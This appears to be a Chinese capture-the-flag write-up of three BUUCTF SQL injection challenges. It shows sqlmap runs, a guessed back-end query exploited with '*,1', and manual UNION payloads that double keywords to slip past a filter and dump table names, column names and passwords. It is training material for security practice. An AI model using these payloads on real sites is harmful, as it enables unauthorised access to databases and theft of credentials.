buuctf sql注入类练习

BUU SQL COURSE 1

  • 1

  • 实例无法访问 / Instance can't be reached at that time | BUUCTF

  • 但是这个地方很迷惑就是这个 一个 # 我们不抓包就不知道这个是sql注入类的

  • 判断是 get 类型的sql注入直接使用sqlmap

  • 我们放入到1.txt中

  • 目的是 优先检测 ?id=1

  • >python3 sqlmap.py -r 1.txt

  • 他会自动的进行检测 对方的数据库类型

  • 直接进行数据搜哈

  • 这个加密是 24英文字母小写是MD5

  • 解密不出来 那就说明这个pass就是密码

  • flag{19a949af-93af-4422-a127-87b23a68c134}

[SUCTF 2019]EasySQL1

  • 老办法复制一下然后 放到1.txt(这个文件需要和sqlmap是同级的文件)

  • 标上 *

  • 发现梭哈失败了 原因 :1、这个过程中经过了 服务器的解密

  • 2、有waf

  • 第一种排除了 是第二种 有waf过滤

  • 输入字母就会无回显但是输入数字

  • 有个Array 这个在php中是数组的意思

  • 也就是我们可以输入一个数组 这个[0] 猜测是 $flag=array[xxxxxxxx]

  • 输入1

  • 会出现 [0]=1

  • 但是输入 0时会消失

  • 输入0和1 发现我们输入什么他就会回显什么

  • 猜测后端的逻辑

  • 我发现一个规律就是 我输入多少个数组 最后一个都是 1

  • 后端逻辑 : select $_POST['query'] || flag from Flag

  • 可能就是当我们输入这个flag是正确的时候就会出现flag 这个很明显不显示

  • 但是我们可以使用 * 让其列出所以的列 然后 ,1 构造这个数组

  • select *,1 || flag from Flag

  • 1 || flag

  • 就是作用类似于 1 or 1 =1

  • select * 是查找所以的值

  • 在mysql中 || 就是或运算符的意思

  • 1 or 一个值的逻辑必然是 true

  • 因为1是真实存在的

  • 但是如果我们输入的flag不是真实存在的就鸡鸡了 但是这个又过滤了字母 所以说这样做事最正确的

[极客大挑战 2019]BabySQL

  • 判断类型

  • 使用逻辑注入 '= \ '=

  • 获取当账号密码

  • 猜测是MD5

  • 失败 那就说明 passwd就是这个

  • 但是这个不是 flag

  • 根据题目提示 bodysql 但是我们不知道是哪个地方的注入抓个包直接使用sqlmap一键梭哈一下

  • 发现失败了

  • python3 sqlmap.py -r 1.txt --level=4

  • 说明可能又有waf

  • 这个双写过滤的逻辑就是 服务器的替换是只能不断向前替换的 不能回头 bbyy 他首先会把 by 换为 ' ' 只能他是不能回头把 b y 进行替换

  • 发现这样构造还是没有 所以就使用手工注入 使用 union 看一下他到底有几个列

  • 发现一共是有 3个数据的

  • 有个知识点就是 不能在url中使用 # 要使用 %23 不然会造成不识别

  • 查表

  • ?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

  • http://6304b807-b309-4f6c-8c46-58857e48ae51.node5.buuoj.cn:81/check.php?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_schema=database()%23

  • 发现这个有两个id 应该不是的

  • 直接找密码

  • ?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

相关推荐
消失的旧时光-194313 小时前
第四篇(实战): 订单表索引设计实战:从慢 SQL 到毫秒级
java·数据库·sql
你才是臭弟弟21 小时前
时序数据库(TDengine TSDB)基本SQL使用
sql·时序数据库·tdengine
Gauss松鼠会1 天前
【openGauss】学习 gsql 命令行的使用
数据库·sql·database·opengauss
Gauss松鼠会1 天前
【openGauss】openGauss 如何进行数据库例行维护
数据库·sql·database·opengauss
l1t1 天前
利用DeepSeek辅助翻译clickhouse SQL为DuckDB 格式求解Advent of Code 2025第10题 电子工厂 第二部分
数据库·人工智能·sql·clickhouse·duckdb
DarkAthena1 天前
【GaussDB】分析函数性能优化案例-row_number改写
数据库·sql·oracle·性能优化·gaussdb
踢足球09291 天前
寒假打卡:2026-01-21
数据库·sql
麦聪聊数据1 天前
基于SQL+CDC构建MySQL到ClickHouse的实时链路
sql·mysql·clickhouse
IT大白1 天前
6、数据库优化
数据库·sql
sg_knight1 天前
SQL 中的 IFNULL 函数是什么?
数据库·sql·mysql·oracle·database·关系型数据库·db